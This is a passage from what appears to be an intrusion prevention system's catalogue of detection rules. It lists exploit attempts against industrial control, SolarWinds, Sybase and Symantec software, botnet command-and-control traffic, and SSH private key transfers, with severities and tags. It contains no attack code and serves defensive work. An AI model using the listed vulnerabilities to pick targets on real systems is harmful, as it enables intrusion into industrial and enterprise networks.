Tags: Windows, Any Hardware, Schneider Electric Unity, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Schneider-Electric-Unity-Pro-Denial-Of-Service
Description:
Back to top

Generic_CS-Schneider-Electric-Web-Designer-ServerSimulator-RCE

About this situation: A vulnerability in Schneider Electric Web Designer
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Schneider Electric Web Designer, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Schneider-Electric-Web-Designer-ServerSimulator-RCE
Description:
Back to top

Generic_CS-SCO-Unix-Calserver-Buffer-Overflow

About this situation: Buffer overflow attempt against SCO Calserver
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, x86, SCO Internet FastStart, SCO Open Server, CVE2000, Unix not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-164-2032
Vulnerability: TCP-SCO-Unix-Calserver-Buffer-Overflow
Description:
Back to top

Generic_CS-Shared-Variable-Fingerprints

About this situation: This fingerprint sets shared variables
Context: TCP Client Stream Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1855-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

Generic_CS-ShixxNOTE-6.net-Font-Field-Overflow

About this situation: An attempt to exploit a ShixxNOTE 6.net Font Field Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ShixxNote 6.net, CVE2004, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Vulnerability: ShixxNOTE-6.net-Font-Field-Overflow
Description:
Back to top

Generic_CS-Sielco-Sistemi-Winlog-Pro-Malformed-Packet-Stack-Buffer-Overflow

About this situation: A vulnerability in Sielco Sistemi Winlog detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Sielco Sistemi Winlog, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Sielco-Sistemi-Winlog-Pro-Malformed-Packet-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow

About this situation: A vulnerability in Sielco Sistemi Winlog detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Sielco Sistemi Winlog, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow
Description:
Back to top

Generic_CS-Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow-2

About this situation: A vulnerability in Sielco Sistemi Winlog detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Sielco Sistemi Winlog, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow
Description:
Back to top

Generic_CS-Siemens-Automation-License-Manager-Almsrv64x.exe-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Siemens Automation License Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens Automation License Manager, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Siemens-Automation-License-Manager-Almsrv64x.exe-Integer-Overflow
Description:
Back to top

Generic_CS-Siemens-FactoryLink-Logging-Path-Param-Buffer-Overflow

About this situation: An attempt to exploit a Siemens FactoryLink Logging Path Param Buffer Overflow vulnerability detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Siemens Tecnomatix FactoryLink, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-820-5242
Vulnerability: Siemens-FactoryLink-Logging-Path-Param-Buffer-Overflow
Description:
Back to top

Generic_CS-Siemens-SIMATIC-WinCC-Flexible-Runtime-Stack-Buffer-Overflow

About this situation: A Siemens SIMATIC WinCC Flexible Runtime Stack Buffer Overflow vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SIMATIC WinCC, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Siemens-SIMATIC-WinCC-Flexible-Runtime-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Siemens-Tecnomatix-FactoryLink-CSService-File-Download

About this situation: Possible file download in Siemens Tecnomatix FactoryLink detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, Siemens Tecnomatix FactoryLink, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Siemens-Tecnomatix-FactoryLink-CSService-File-Download
Description:
Back to top

Generic_CS-Siemens-Tecnomatix-FactoryLink-Multiple-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability in Siemens Tecnomatix FactoryLink detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens Tecnomatix FactoryLink, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Siemens-Tecnomatix-FactoryLink-Multiple-Buffer-Overflows
Description:
Back to top

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Arbitrary-File-Creation

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: 3s-Smart-Software-Solutions-Codesys-Gateway-Server-Arbitrary-File-Creation
Description:
Back to top

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: 3s-Smart-Software-Solutions-Codesys-Gateway-Server-Denial-Of-Service
Description:
Back to top

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: Smart-Software-Solutions-Codesys-Gateway-Server-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: Smart-Software-Solutions-Codesys-Gateway-Server-Integer-Overflow
Description:
Back to top

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Memory-Access-Error

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-521-5211
Vulnerability: 3s-Smart-Software-Solutions-Codesys-Gateway-Server-Memory-Access-Error
Description:
Back to top

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Traversal

About this situation: An attempt to exploit a vulnerability in Codesys Gateway server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Smart Software Solutions CoDeSys, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Smart-Software-Solutions-Codesys-Gateway-Server-Traversal
Description:
Back to top

Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-521-5211
Vulnerability: 3s-Smart-Software-Solutions-Codesys-Gateway-Server-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-CltDHPubKeyLen-Out-of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in SolarWinds DameWare Mini Remote Control detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, DameWare Mini Remote Control, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Vulnerability: Solarwinds-Dameware-Mini-Remote-Control-CltDHPubKeyLen-Out-of-Bounds-Read
Description:
Back to top

Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-Rsapubkeylen-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SolarWinds DameWare Mini Remote Control detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, DameWare Mini Remote Control, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Vulnerability: Solarwinds-Dameware-Mini-Remote-Control-Rsapubkeylen-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-RsaSignatureLen-Out-of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in SolarWinds DameWare Mini Remote Control detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, DameWare Mini Remote Control, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1188-5242
Vulnerability: Solarwinds-Dameware-Mini-Remote-Control-RsaSignatureLen-Out-of-Bounds-Read
Description:
Back to top

Generic_CS-Solarwinds-Dameware-Sigpubkey-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SolarWinds DameWare detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, DameWare Mini Remote Control, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1246-5242
Vulnerability: Solarwinds-Dameware-Sigpubkey-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Solarwinds-Log-And-Event-Manager-Static-Credentials

About this situation: An attempt to exploit a vulnerability in SolarWinds Log & Event Manager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Log and Event Manager, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Vulnerability: Solarwinds-Log-And-Event-Manager-Static-Credentials
Description:
Back to top

Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2022-38111-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Performance Monitor (NPM) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Solarwinds-Network-Performance-Monitor-CVE-2022-38111-Insecure-Deserialization
Description:
Back to top

Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2022-47503-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Platform detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: Solarwinds-Network-Performance-Monitor-CVE-2022-47503-Insecure-Deserialization
Description:
Back to top

Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2023-23836-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Performance Monitor (NPM) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1623-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Solarwinds-Network-Performance-Monitor-CVE-2023-23836-Insecure-Deserialization
Description:
Back to top

Generic_CS-Solarwinds-Network-Performance-Monitor-Sqlfilescript-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Platform detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1603-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Solarwinds-Network-Performance-Monitor-Sqlfilescript-Insecure-Deserialization
Description:
Back to top

Generic_CS-Solarwinds-NPM-BytesToMessage-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Performance Monitor detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Solarwinds-NPM-BytesToMessage-Insecure-Deserialization
Description:
Back to top

Generic_CS-Solarwinds-NPM-Propertybagjsonconverter-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Performance Monitor (NPM) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), SolarWinds Orion, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Solarwinds-NPM-Propertybagjsonconverter-Insecure-Deserialization
Description:
Back to top

Generic_CS-Solarwinds-Orion-NPM-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in SolarWinds Orion NPM detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Performance Monitor (NPM), CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1145-5242
Vulnerability: Solarwinds-Orion-NPM-Remote-Code-Execution
Description:
Back to top

Generic_CS-Solarwinds-Orion-Platform-MSMQ-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Orion Platform detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: Solarwinds-Orion-Platform-MSMQ-Insecure-Deserialization
Description:
Back to top

Generic_CS-Spotify-Network-Connect

About this situation: An attempt to contact to the Spotify network.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Spotify, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-944-5242
Vulnerability: Spotify-Usage
Description:
Back to top

Generic_CS-Squid-SSL-Bump-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-805-5242
Vulnerability: Squid-SSL-Bump-Denial-Of-Service
Description:
Back to top

Generic_CS-Srizbi-Spambot

About this situation: Srizbi spambot command and control channel communication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Srizbi spambot, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-618-5211
Vulnerability: Srizbi-Spambot
Description:
Back to top

Generic_CS-SSH-Private-Key-File-Transfer

About this situation: An SSH Private Key file transfer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: SSH-Private-Key-File-Transfer
Description:
Back to top

Generic_CS-Streamcast-0.9.75-Buffer-Overflow

About this situation: Streamcast 0.9.75 And Earlier Stack Based Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Streamcast, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: Streamcast-0.9.75-Buffer-Overflow
Description:
Back to top

Generic_CS-StrongSwan-Certificate-And-Identification-Payload-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in strongSwan detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, strongSwan, CVE2010, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: StrongSwan-Certificate-And-Identification-Payload-Parsing-Buffer-Overflow
Description:
Back to top

Generic_CS-Studio-Manager-Denial-of-Service

About this situation: StudioManager.exe denial of service 0day
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Studio Manager, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Studio-Manager-Denial-of-Service
Description:
Back to top

Generic_CS-Sun-Java-System-Web-Server-Admin-Server-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java System Web Server detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Sun Java Web Server, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-286-4219
Last changed: sgpkg-ips-286-4219
Vulnerability: Sun-Java-System-Web-Server-Admin-Server-Denial-Of-Service
Description:
Back to top

Generic_CS-Sun-Java-Web-Console-Login-Format-String-Vulnerability

About this situation: Attempt to exploit a format string vulnerability on Sun Java Web Console
Context: TCP Client Stream Unknown
Severity: 7
Tags: Solaris, Any Hardware, Sun Java Web Console, CVE2007, Solaris not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1137-5242
Vulnerability: Sun-Java-Web-Console-Login-Format-String-Vulnerability
Description:
Back to top

Generic_CS-Sunway-ForceControl-Denial-Of-Service-Vulnerability

About this situation: An attempt to exploit a vulnerability in Sunway ForceControl detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sunway ForceControl, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Sunway-ForceControl-Denial-Of-Service-Vulnerability
Description:
Back to top

Generic_CS-Sunway-ForceControl-Netdbserver-Integer-Signedness-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sunway ForceControl detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sunway ForceControl, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Sunway-ForceControl-SNMP-Netdbserver-Integer-Signedness-Buffer-Overflow
Description:
Back to top

Generic_CS-Sunway-ForceControl-SNMP-Netdbserver-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sunway ForceControl detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sunway ForceControl, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: Sunway-ForceControl-SNMP-Netdbserver-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Suspicious-Java-Serialized-Object

About this situation: A suspicious Java serialized object detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2016, CVE2017, CVE2021, CVE2023, Any Operating System not specific, Any Software not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1546-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Adobe-ColdFusion-Rmi-Registry-Insecure-Deserialization
Ysoserial-Generated-Java-Serialized-Object
Delta-Electronics-Infrasuite-Device-Master-Activemq-Insecure-Deserialization
Apache-Tomcat-JmxRemoteLifecycleListener-Remote-Code-Execution-CVE-2016-8735
Neo4J-Shell-Server-setSessionVariable-Deserialization-CVE-2021-34371
Description:
Back to top

Generic_CS-Suspicious-Request

About this situation: A suspicious traffic pattern detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

Generic_CS-Sybase-Open-Server-Function-Pointer-Array-Code-Execution

About this situation: An attempt to exploit a vulnerability in Sybase OpenServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sybase Open Server, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1557-5242
Vulnerability: Sybase-Open-Server-Function-Pointer-Array-Code-Execution
Description:
Back to top

Generic_CS-Sybase-Open-Server-Null-Byte-Stack-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Sybase Open Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sybase Open Server, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-408-4219
Vulnerability: Sybase-Open-Server-Null-Byte-Stack-Memory-Corruption
Description:
Back to top

Generic_CS-Sybase-SQL-Anywhere-Mobilink-Crafted-Strings-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sybase MobiLink detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sybase MobiLink, Sybase SQL Anywhere Studio, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Sybase-SQL-Anywhere-Mobilink-Crafted-Strings-Buffer-Overflow
Description:
Back to top

Generic_CS-Sydigu.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Trojan.Sydigu-Botnet
Description:
Back to top

Generic_CS-Symantec-Alert-Management-System-Amssendalertack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Antivirus Corporate Edition detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Antivirus Corporate Edition, Symantec Quarantine Server, Symantec Systems Center, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1351-5242
Vulnerability: Symantec-Alert-Management-System-Amssendalertack-Buffer-Overflow
Description:
Back to top

Generic_CS-Symantec-Alert-Management-System-HNDLRSVC-Command-Execution

About this situation: An attempt to exploit a command execution vulnerability in Symantec Alert Management System service detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Antivirus Corporate Edition, Symantec Client Security, Symantec System Center, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-373-4219
Vulnerability: Symantec-Alert-Management-System-HNDLRSVC-Command-Execution
Description:
Back to top

Generic_CS-Symantec-Alert-Management-System-Modem-String-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Antivirus Corporate Edition detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Antivirus Corporate Edition, Symantec Quarantine Server, Symantec Systems Center, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1351-5242
Vulnerability: Symantec-Alert-Management-System-Modem-String-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Symantec-Alert-Management-System-Pin-Number-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Antivirus Corporate Edition detected
Context: TCP Client Stream Unknown
Severity: 7
